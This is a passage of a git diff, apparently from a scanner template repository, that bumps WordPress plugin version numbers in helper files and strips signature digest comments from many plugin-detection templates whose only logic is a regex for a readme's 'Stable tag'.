http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 207 files changed, 7 insertions(+), 207 deletions(-) diff --git a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt index 682895218b..d78433cb7b 100644 --- a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt +++ b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt @@ -1 +1 @@ -4.15.1 \ No newline at end of file +4.15.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt index d1762736f9..dd5f33f3aa 100644 --- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -1 +1 @@ -7.27.0 \ No newline at end of file +7.28.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt index 5704ce4690..6eae100a2d 100644 --- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -1 +1 @@ -8.27.0 \ No newline at end of file +8.28.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/image-optimization.txt b/helpers/wordpress/plugins/image-optimization.txt index e21e727f96..13175fdc43 100644 --- a/helpers/wordpress/plugins/image-optimization.txt +++ b/helpers/wordpress/plugins/image-optimization.txt @@ -1 +1 @@ -1.4.0 \ No newline at end of file +1.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index 7857a9473e..01129dc3ec 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.4.2 \ No newline at end of file +8.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 706739ee87..575a07b9f9 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.13.9 \ No newline at end of file +2.14.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/under-construction-page.txt b/helpers/wordpress/plugins/under-construction-page.txt index eb32965f64..10515a84be 100644 --- a/helpers/wordpress/plugins/under-construction-page.txt +++ b/helpers/wordpress/plugins/under-construction-page.txt @@ -1 +1 @@ -4.00 \ No newline at end of file +4.01 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 15eddd772b..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d624bd84326dca61e246f972f495a5534bb6b5d022c76b569d810da13f5aeb45022100fa9f3049fe128fbc658184dbef94483903be0d6b6ec917a742495b4a50a10ab9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 0569c8afb7..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ddff74ab9b38fa738abe7257fa11222932f210be1d1be045ab6eef787c0d9a4022100edc84f440c9b1fbf967c709dac63aca92f987e23625e59b9c23dbf2bc2607cb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index fd5fe22c6c..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f292b4b8cf8996aec6077f6bd537d618b6956823d683df7dfd4d66372561ac86022100ae71e9e54caeb3aa308125b17188513ac165d2da07fa35db487fb8df0b885140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 83ede16e28..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009580cc2900e229bc0e018445dc3b9afa955bf083fe93f7872fe074727310fa8d022100dcc0395ac9ca6a7ecaeb8a5ba4c2152d5117651f066ee546953872bf1319be34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 9bbece900e..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e65698e434f08bd35ba892e540eb569fc1189c45899a0914689fb420c4a78323022054e5200a2e840dc67d8b4c05939b8db24569b3434aad7cd9eb58451199735bc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 51a84e9c9b..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e681e7d27b33660adfdb5938af0acc3a2f3bfe1ea512c74e2acfba15cb2fd410220427b32914893df9e8dcea7f89958fdbcbd25ec2c85840b63482cf160590f229f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 90451ae019..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204115bab6f88e06d09063ba1775cec4c8d8e2cc1a2283b02e2c2f319b18edbec602206a87ada184224b4d003910e909234b3d68446482e173df2304e3e67b78a71f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 1a029ed243..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d9186ac7303f98fe417e99a17855b1b63b206ac7a168853a9a2bf733d25d189022100dcca3154e2d8bc723cab1d5eaddded8f2bd26588ad95f9c329ecaef9a3fb7d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 4185196c3c..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026f21ec462ac820874cd71ef21ebde1eaa2a131f75a8c1b4899026ba54570dcb02206f1309188894d6ca56708632206528e5720ea63a9761b20918227edb2de42925:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 3e7b53ea39..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014c30c5d522f3279910c698661a67947b62614a83df0fd3e645d23b5c0a8a95a022100e9e18a3429119b53f28846d0eb2b70016d00a81a034a532ca0dd22cb80a785e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 2db80ac293..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100841cacc56d978ddcb013c08695a3f19bee98c1a573907be39a7cf95320076869022022fe0b9da9cbf3073050c9bc85c33b7faf79aa48193e351e2431fbeb6b33f761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 0d4976f8dc..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070a2859618715a6f03c36389cf8f0179c27fc9e00bf4335f317b7d9cd0278f5d022034d9d4cf31298ca79d534d9469938013e73dde78840ed4c1020a5f73a9560338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index a36c49bdad..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e59925563707540c31d06780f65a0c09b333d5d5ddeff9a9d533844c86076db5022100af9bab33878f862f0f9d730ddafa4aa14f2cc0d0b812ed25a4efdcbae842001b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index a99112ab20..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c95941015a5027f2223af04c443311715677789944b066da0b8553cc825615c022100ec280320ef0fc2e243dc47f1ef079482b8b1f52c7ba373f2f40b9c6c31f778e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 70f7ea5fd3..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063011d963941ffb2ad5defd0d5c7dec3592dd17ec5261317a50d188b7071e0ab022100d04df6629d4763ed3e5c61149922305958d53f85523591a0123991737fbdc3c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 92abed5098..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d6c51299b71b07a42e48a38347edc1ea42549eb8c3203a46000817af414d7fee022051d5ad02e092747cb682f5817ea5365c48c1c9f33e5d8473147155ae6c453328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index bca7d6a70c..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bf201f8ed276b05fe3ef4af2842db8e25120c45c5618a5ac50d8d828f0f97d6022100de34692a4c6a0d3a21e405a32fb6da1f717d145f1b3a43c8f200b422f9ab763f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 8c90fcd1d8..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016683176764dc731dae5eead9f4dcf9d109606c350a897dbdff83db357d05759022060042232633619f1c93473aaec7cf2f40dcaba03af3ac1e07c952b19e44ea5a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index abae0f1cb2..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da22d59038fd2a88a36240998159a883590e4dc7eb37875dc14136cfc2569f6f02200aa96c3d9390cda4e0f8b08dee8e86a9cca221ab09c6f070e9504eec3c643fae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 60a0eaefe6..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fb221de3ad3e57bfa069a6cdf516704af2ac4239e88505bde7b5fdb27cbd287f0221008eba7dacee57096a18fdac69167d9a107c1dbb77b9aec0148986a685f1927531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index f6e3d89944..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b1b69914c23f3ea507e8b6caad1af674f063dadbb6d9b5717df29362e868746c02202fd563c1f69141a85abd7f624be9aeb5b3fe487a7ad8f412041ec74ef8ec77d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 46a4d8a269..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100931277bd3c8b456d29d1af9a5401e62c734c99379e54637e51c8f0182089e75702210096e43ecfb7e4b72fd3d9895b4f1e72fb3e34306aeb7889fb949145d013f1f696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index beac37bd6d..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d44dfc4b4e004202878a5d995382e325d5fbc6274c284420676d9a376c855b6022100cc6a0f9575e01b8232203ca39f6a6b4dfdad9c197943c9665364275c8358e915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 225d1fc258..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204057054982c186824c9a2a5a26bb99f270e72b156ae9bbf8fe07570fb80ec73702206b84173291087e7d44374d09b87c0470c55dc861e016f78c79887bcf3aac520d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 46089b7aab..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d1e106d4220f50c1de932439eac28c514f9cbbd0f1d67e5fc90d26a4e29645f02205c4e478de3ba5ebe8d2a1e3499f90e894c259b3bc38e89948519020ee7d08014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 2e879b5da3..dcea952545 100644 --- 